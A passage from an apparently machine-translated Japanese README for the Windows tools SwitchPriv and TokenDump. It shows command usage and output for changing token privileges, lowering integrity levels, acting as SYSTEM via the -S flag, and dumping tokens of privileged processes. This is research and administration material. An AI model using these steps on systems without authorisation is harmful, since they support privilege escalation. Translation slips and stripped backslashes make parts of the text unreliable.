SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -r inc
[>] Trying to remove a token privilege.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 9408 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 9408
[*] Process Name : Notepad
[+] Got 4 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= ==========================
SeShutdownPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Disabled
SeUndockPrivilege Enabled
SeTimeZonePrivilege Disabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
特定の特権をテストしたい場合は、次のように-fオプションでテストする以外のすべての特権を削除できます。
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 5 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeShutdownPrivilege Enabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Enabled
SeIncreaseWorkingSetPrivilege Enabled
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -f tim
[>] Trying to remove all token privileges except one.
[*] Target PID : 4392
[*] Process Name : powershell
[>] Trying to remove all privileges except for SeTimeZonePrivilege.
[+] SeShutdownPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 4392
[*] Process Name : powershell
[+] Got 1 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
=================== =======
SeTimeZonePrivilege Enabled
[*] Integrity Level : Medium Mandatory Level
[*] Done.
次のように、コンマ分離値を使用して複数の特権をフィルタリングできます。
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 24 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
[*] Integrity Level : High Mandatory Level
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -f rest,back,deb
[>] Trying to remove all token privileges except one.
[*] Target PID : 24300
[*] Process Name : powershell
[>] Trying to remove privileges other than follows.
[*] SeBackupPrivilege
[*] SeRestorePrivilege
[*] SeDebugPrivilege
[+] SeIncreaseQuotaPrivilege is removed successfully.
[+] SeSecurityPrivilege is removed successfully.
[+] SeTakeOwnershipPrivilege is removed successfully.
[+] SeLoadDriverPrivilege is removed successfully.
[+] SeSystemProfilePrivilege is removed successfully.
[+] SeSystemtimePrivilege is removed successfully.
[+] SeProfileSingleProcessPrivilege is removed successfully.
[+] SeIncreaseBasePriorityPrivilege is removed successfully.
[+] SeCreatePagefilePrivilege is removed successfully.
[+] SeShutdownPrivilege is removed successfully.
[+] SeSystemEnvironmentPrivilege is removed successfully.
[+] SeChangeNotifyPrivilege is removed successfully.
[+] SeRemoteShutdownPrivilege is removed successfully.
[+] SeUndockPrivilege is removed successfully.
[+] SeManageVolumePrivilege is removed successfully.
[+] SeImpersonatePrivilege is removed successfully.
[+] SeCreateGlobalPrivilege is removed successfully.
[+] SeIncreaseWorkingSetPrivilege is removed successfully.
[+] SeTimeZonePrivilege is removed successfully.
[+] SeCreateSymbolicLinkPrivilege is removed successfully.
[+] SeDelegateSessionUserImpersonatePrivilege is removed successfully.
[*] Done.
PS C:Dev> .SwitchPriv.exe -p 24300 -g
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 24300
[*] Process Name : powershell
[+] Got 3 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================= ========
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeDebugPrivilege Enabled
[*] Integrity Level : High Mandatory Level
[*] Done.
利用可能なすべてのトークン特権を有効、無効化、または削除するには、 all価値を--enable 、 --disable 、または--removeオプション」として指定します。
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
PS C:Dev> .SwitchPriv.exe -e all
[>] Trying to enable all token privileges.
[*] Target PID : 6772
[*] Process Name : powershell
[+] SeShutdownPrivilege is enabled successfully.
[+] SeUndockPrivilege is enabled successfully.
[+] SeIncreaseWorkingSetPrivilege is enabled successfully.
[+] SeTimeZonePrivilege is enabled successfully.
[*] Done.
PS C:Dev> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== =======
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
プロセスを見つけるには、特定の特権を持つには、次のように-sオプションを使用します。
PS C:Dev> .SwitchPriv.exe -s createt
[>] Searching processes have SeCreateTokenPrivilege.
[+] Got 5 process(es).
[*] Memory Compression (PID : 2548)
[*] smss (PID : 372)
[*] lsass (PID : 736)
[*] csrss (PID : 584)
[*] csrss (PID : 504)
[*] Access is denied by following 2 process(es).
[*] System (PID : 4)
[*] Idle (PID : 0)
[*] Done.
PS C:Dev> .SwitchPriv.exe -g -p 2548
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
整合性レベルを設定する場合は、次のように--integrityオプションを使用します。
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelMedium Mandatory Level Label S-1-16-8192
PS C:Dev> .SwitchPriv.exe -i 1
[>] Trying to update Integrity Level.
[*] Target PID : 3436
[*] Process Name : powershell
[>] Trying to update Integrity Level to LOW_MANDATORY_LEVEL.
[+] Integrity Level is updated successfully.
[*] Done.
PS C:Dev> whoami /groups | findstr /i level
Mandatory LabelLow Mandatory Level Label S-1-16-4096
システムとしてアクションを実行するには、次のように-Sフラグを設定します( SeDebugPrivilegeとSeImpersonatePrivilegeが必要です):
PS C:Dev> .SwitchPriv.exe -g -p 2548 -S
[>] Trying to get available token privilege(s) for the target process.
[*] Target PID : 2548
[*] Process Name : Memory Compression
[>] Trying to get SYSTEM.
[+] Got SYSTEM privilege.
[+] Got 31 token privilege(s).
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeCreateTokenPrivilege Disabled
SeAssignPrimaryTokenPrivilege Disabled
SeLockMemoryPrivilege EnabledByDefault, Enabled
SeIncreaseQuotaPrivilege Disabled
SeTcbPrivilege EnabledByDefault, Enabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege EnabledByDefault, Enabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege EnabledByDefault, Enabled
SeIncreaseBasePriorityPrivilege EnabledByDefault, Enabled
SeCreatePagefilePrivilege EnabledByDefault, Enabled
SeCreatePermanentPrivilege EnabledByDefault, Enabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege EnabledByDefault, Enabled
SeAuditPrivilege EnabledByDefault, Enabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeTrustedCredManAccessPrivilege Disabled
SeRelabelPrivilege Disabled
SeIncreaseWorkingSetPrivilege EnabledByDefault, Enabled
SeTimeZonePrivilege EnabledByDefault, Enabled
SeCreateSymbolicLinkPrivilege EnabledByDefault, Enabled
SeDelegateSessionUserImpersonatePrivilege EnabledByDefault, Enabled
[*] Integrity Level : System Mandatory Level
[*] Done.
トップに戻ります
プロジェクト
このツールは、トークン情報を検査するためのユーティリティです。
C:Dev>.TokenDump.exe -h
TokenDump - Tool to dump processs token information.
Usage: TokenDump.exe [Options]
-h, --help : Displays this help message.
-d, --debug : Flag to enable SeDebugPrivilege.
-e, --enum : Flag to enumerate brief information tokens for processes or handles.
-T, --thread : Flag to scan thead tokens. Use with -e option.
-H, --handle : Flag to scan token handles. Use with -e option.
-s, --scan : Flag to get verbose information for a specific process, thread or handle.
-a, --account : Specifies account name filter string. Use with -e flag.
-p, --pid : Specifies a target PID in decimal format. Use with -s flag, or -e and -H flag.
-t, --tid : Specifies a target TID in decimal format. Use with -s flag and -p option.
-v, --value : Specifies a token handle value in hex format. Use with -s flag and -p option.
すべてのプロセスにトークンを列挙するには、 -eフラグを設定するだけです。
C:Dev>.TokenDump.exe -e
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
--snip--
6712 0 svchost.exe NT AUTHORITYLOCAL SERVICE System False False
1972 0 svchost.exe NT AUTHORITYSYSTEM System False False
[+] Got 129 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
sedebugprivilegeを有効にしたい場合は、次のように-dフラグを設定します。
C:Dev>.TokenDump.exe -e -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= =========================== ============================ ========= ========== ============
5004 0 svchost.exe NT AUTHORITYSYSTEM System False False
3728 0 conhost.exe NT AUTHORITYSYSTEM System False False
3740 0 vm3dservice.exe NT AUTHORITYSYSTEM System False False
--snip--
-Hフラグを使用して-eフラグを設定すると、Tokendumpはトークンハンドル情報を列挙しようとします。
C:Dev>.TokenDump.exe -e -H -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
--snip--
[Token Handle(s) - svchost.exe (PID: 3272)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ========================== ========= ========== ============ ========== ===================
0x168 0 NT AUTHORITYLOCAL SERVICE System False False Primary Anonymous
[+] Got 819 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
-pオプションを使用して指定されたPIDの場合、TOKENDUPは指定されたプロセスハンドルのみを列挙します。
C:Dev>.TokenDump.exe -e -H -d -p 704
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - winlogon.exe (PID: 704)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= =================== ========= ========== ============ ============= ===================
0x2B0 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x2B4 1 NT AUTHORITYSYSTEM System False False Primary Anonymous
0x38C 1 dev22h2user Medium False False Primary Impersonation
0x398 1 dev22h2user High False False Primary Identification
0x3C4 1 dev22h2user Medium False False Impersonation Impersonation
0x3C8 1 dev22h2user Medium False False Impersonation Impersonation
0x3D0 1 dev22h2user Medium False False Impersonation Impersonation
0x3D4 1 dev22h2user Medium False False Impersonation Impersonation
[+] Got 8 handle(s).
[*] Found 2 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Done.
誤ったスレッドトークンを列挙するには、次のように-e -Tを設定します。
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
1952 2300 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4348 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
3516 4656 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
[+] Got 4 thread(s).
[*] Found 1 account(s).
[*] NT AUTHORITYSYSTEM
[*] Done.
これらの結果をトークンユーザー名でフィルタリングする場合は、次のように-aオプション値としてフィルター文字列を設定します。
C:Dev>.TokenDump.exe -e -a network -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate process token.
PID Session Process Name Token User Integrity Restricted AppContainer
==== ======= ============ ============================ ========= ========== ============
1932 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3500 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2904 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
2504 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
7012 0 msdtc.exe NT AUTHORITYNETWORK SERVICE System False False
7092 0 sppsvc.exe NT AUTHORITYNETWORK SERVICE System False False
1676 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
3584 0 WmiPrvSE.exe NT AUTHORITYNETWORK SERVICE System False False
1000 0 svchost.exe NT AUTHORITYNETWORK SERVICE System False False
[+] Got 9 token information.
[*] Found 7 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYNETWORK SERVICE
[*] Font Driver HostUMFD-0
[*] Font Driver HostUMFD-1
[*] Window ManagerDWM-1
[*] Done.
C:Dev>.TokenDump.exe -e -a network -d -H
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate token handles.
[Token Handle(s) - lsass.exe (PID: 768)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ============= ===================
0x914 0 NT AUTHORITYNETWORK SERVICE System False False Impersonation Impersonation
--snip--
[Token Handle(s) - msdtc.exe (PID: 7012)]
Handle Session Token User Integrity Restricted AppContainer Token Type Impersonation Level
====== ======= ============================ ========= ========== ============ ========== ===================
0x23C 0 NT AUTHORITYNETWORK SERVICE System False False Primary Anonymous
[+] Got 27 handle(s).
[*] Found 8 account(s).
[*] NT AUTHORITYSYSTEM
[*] dev22h2user
[*] Font Driver HostUMFD-1
[*] Font Driver HostUMFD-0
[*] NT AUTHORITYNETWORK SERVICE
[*] Window ManagerDWM-1
[*] NT AUTHORITYLOCAL SERVICE
[*] NT AUTHORITYANONYMOUS LOGON
[*] Done.
特定のプロセスの詳細情報を取得するには、 -sフラグとターゲットPIDを-pオプション値として設定します。
C:Dev>.TokenDump.exe -s -p 5996
[>] Trying to dump process token information.
[Token Information for StartMenuExperienceHost.exe (PID: 5996)]
ImageFilePath : C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe
CommandLine : "C:WindowsSystemAppsMicrosoft.Windows.StartMenuExperienceHost_cw5n1h2txyewyStartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x0000000000063D9A
Authentication ID : 0x000000000001DFE5
Original ID : 0x00000000000003E7
Modified ID : 0x0000000000063D24
Integrity Level : Low
Protection Level : N/A
Session ID : 1
Elevation Type : Limited
Mandatory Policy : NoWriteUp
Elevated : False
AppContainer : True
TokenFlags : VirtualizeAllowed, IsFiltered, LowBox
AppContainer Name : microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy
AppContainer SID : S-1-15-2-515815643-2845804217-1874292103-218650560-777617685-4287762684-137415000
AppContainer Number : 2
Has Linked Token : True
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
============================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group UseForDenyOnly
BUILTINAdministrators UseForDenyOnly
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelLow Mandatory Level Integrity, IntegrityEnabled
APPCONTAINER CAPABILITIES
-------------------------
Capability Name Flags
========================================================================== =======
APPLICATION PACKAGE AUTHORITYYour Internet connection Enabled
APPLICATION PACKAGE AUTHORITYYour home or work networks Enabled
NAMED CAPABILITIESPackageQuery Enabled
NAMED CAPABILITIESActivitySystem Enabled
NAMED CAPABILITIESPreviewStore Enabled
NAMED CAPABILITIESCortanaPermissions Enabled
NAMED CAPABILITIESAppointmentsSystem Enabled
NAMED CAPABILITIESTeamEditionExperience Enabled
NAMED CAPABILITIESShellExperience Enabled
NAMED CAPABILITIESPackageContents Enabled
NAMED CAPABILITIESVisualElementsSystem Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
NAMED CAPABILITIESActivityData Enabled
NAMED CAPABILITIESCloudStore Enabled
NAMED CAPABILITIESTargetedContent Enabled
NAMED CAPABILITIESStoreAppInstall Enabled
NAMED CAPABILITIESStoreLicenseManagement Enabled
NAMED CAPABILITIESCortanaSettings Enabled
NAMED CAPABILITIESDependencyTarget Enabled
NAMED CAPABILITIESSearchSettings Enabled
NAMED CAPABILITIESCellularData Enabled
NAMED CAPABILITIESWifiData Enabled
PACKAGE CAPABILITYmicrosoft.windows.startmenuexperiencehost_cw5n1h2txyewy Enabled
NAMED CAPABILITIESAccessoryManager Enabled
NAMED CAPABILITIESUserAccountInformation Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
======================================================= =========================== ===== =============
dev22h2user GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
microsoft.windows.startmenuexperiencehost_cw5n1h2txyewy GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[Linked Token Information for StartMenuExperienceHost.exe (PID: 5996)]
Token User : dev22h2user (SID: S-1-5-21-3896868301-3921591151-1374190648-1001)
Token Owner : BUILTINAdministrators (SID: S-1-5-32-544)
Primary Group : dev22h2None (SID: S-1-5-21-3896868301-3921591151-1374190648-513)
Token Type : Impersonation
Impersonation Level : Identification
Token ID : 0x000000000016ECE6
Authentication ID : 0x000000000001DF83
Original ID : 0x00000000000003E7
Modified ID : 0x000000000001DFE4
Integrity Level : High
Protection Level : N/A
Session ID : 1
Elevation Type : Full
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : True
AppContainer : False
TokenFlags : NotLow
Token Source : User32
Token Source ID : 0x000000000001DE9D
PRIVILEGES INFORMATION
----------------------
Privilege Name State
========================================= =========================
SeIncreaseQuotaPrivilege Disabled
SeSecurityPrivilege Disabled
SeTakeOwnershipPrivilege Disabled
SeLoadDriverPrivilege Disabled
SeSystemProfilePrivilege Disabled
SeSystemtimePrivilege Disabled
SeProfileSingleProcessPrivilege Disabled
SeIncreaseBasePriorityPrivilege Disabled
SeCreatePagefilePrivilege Disabled
SeBackupPrivilege Disabled
SeRestorePrivilege Disabled
SeShutdownPrivilege Disabled
SeDebugPrivilege Disabled
SeSystemEnvironmentPrivilege Disabled
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeRemoteShutdownPrivilege Disabled
SeUndockPrivilege Disabled
SeManageVolumePrivilege Disabled
SeImpersonatePrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
SeIncreaseWorkingSetPrivilege Disabled
SeTimeZonePrivilege Disabled
SeCreateSymbolicLinkPrivilege Disabled
SeDelegateSessionUserImpersonatePrivilege Disabled
GROUP INFORMATION
-----------------
Group Name Attributes
============================================================= =============================================
dev22h2None Mandatory, EnabledByDefault, Enabled
Everyone Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account and member of Administrators group Mandatory, EnabledByDefault, Enabled
BUILTINAdministrators Mandatory, EnabledByDefault, Enabled, Owner
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYINTERACTIVE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLocal account Mandatory, EnabledByDefault, Enabled
NT AUTHORITYLogonSessionId_0_122425 Mandatory, EnabledByDefault, Enabled, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
NT AUTHORITYNTLM Authentication Mandatory, EnabledByDefault, Enabled
Mandatory LabelHigh Mandatory Level Integrity, IntegrityEnabled
DACL INFORMATION
----------------
Account Name Access Flags Type
==================================== =========================== ===== =============
BUILTINAdministrators GenericAll None AccessAllowed
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
NT AUTHORITYLogonSessionId_0_122425 GenericExecute, GenericRead None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] WIN://SYSAPPID
Flags : None
Type : String
Value[0x00] : Microsoft.Windows.StartMenuExperienceHost_10.0.22621.1_neutral_neutral_cw5n1h2txyewy
Value[0x01] : App
Value[0x02] : Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy
[*] WIN://PKG
Flags : None
Type : UInt64
Value[0x00] : 0x0000000200000001
[*] WIN://PKGHOSTID
Flags : None
Type : UInt64
Value[0x00] : 0x1000000000000001
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000041
Value[0x01] : 0x0000000000063D9B
[*] Done.
特定のプロセスとしてのハンドル値を-vオプションとして、PIDとして-pオプションとして-sフラグとして設定する場合、このツールは次のようにハンドルの冗長な情報を取得します。
C:Dev>.TokenDump.exe -s -p 7012 -v 0x23C -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to dump token handle information.
[Token Information for Handle 0x23C of msdtc.exe (PID: 7012)]
Token User : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Owner : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Primary Group : NT AUTHORITYNETWORK SERVICE (SID: S-1-5-20)
Token Type : Primary
Impersonation Level : Anonymous
Token ID : 0x000000000007DF17
Authentication ID : 0x00000000000003E4
Original ID : 0x00000000000003E7
Modified ID : 0x000000000007DEE2
Integrity Level : System
Protection Level : N/A
Session ID : 0
Elevation Type : Default
Mandatory Policy : NoWriteUp, NewProcessMin
Elevated : False
AppContainer : False
TokenFlags : IsFiltered, NotLow
Has Linked Token : False
Token Source : N/A
Token Source ID : N/A
PRIVILEGES INFORMATION
----------------------
Privilege Name State
======================= =========================
SeChangeNotifyPrivilege EnabledByDefault, Enabled
SeCreateGlobalPrivilege EnabledByDefault, Enabled
GROUP INFORMATION
-----------------
Group Name Attributes
====================================== ====================================================
Mandatory LabelSystem Mandatory Level Integrity, IntegrityEnabled
Everyone Mandatory, EnabledByDefault, Enabled
BUILTINUsers Mandatory, EnabledByDefault, Enabled
NT AUTHORITYSERVICE Mandatory, EnabledByDefault, Enabled
CONSOLE LOGON Mandatory, EnabledByDefault, Enabled
NT AUTHORITYAuthenticated Users Mandatory, EnabledByDefault, Enabled
NT AUTHORITYThis Organization Mandatory, EnabledByDefault, Enabled
NT SERVICEMSDTC EnabledByDefault, Enabled, Owner
NT AUTHORITYLogonSessionId_0_515780 Mandatory, EnabledByDefault, Enabled, Owner, LogonId
LOCAL Mandatory, EnabledByDefault, Enabled
DACL INFORMATION
----------------
Account Name Access Flags Type
=================== =========== ===== =============
NT AUTHORITYSYSTEM GenericAll None AccessAllowed
OWNER RIGHTS ReadControl None AccessAllowed
NT SERVICEMSDTC GenericAll None AccessAllowed
SECURITY ATTRIBUTES INFORMATION
-------------------------------
[*] TSA://ProcUnique
Flags : NonInheritable, Unique
Type : UInt64
Value[0x00] : 0x0000000000000070
Value[0x01] : 0x000000000007DF18
[*] Done.
スレッドに適用されたトークンになりすましを調査するには、スレッドIDを次のように-tオプションとして設定します。
C:Dev>.TokenDump.exe -e -T -d
[>] Trying to enable SeDebugPrivilege.
[+] SeDebugPrivilege is enabled successfully.
[>] Trying to enumerate impersonated threads.
PID TID Session Process Name Token User Integrity Impersonation Level
==== ==== ======= ============ =================== ========= ===================
1952 2000 0 svchost.exe NT AUTHORITYSYSTEM System Impersonation
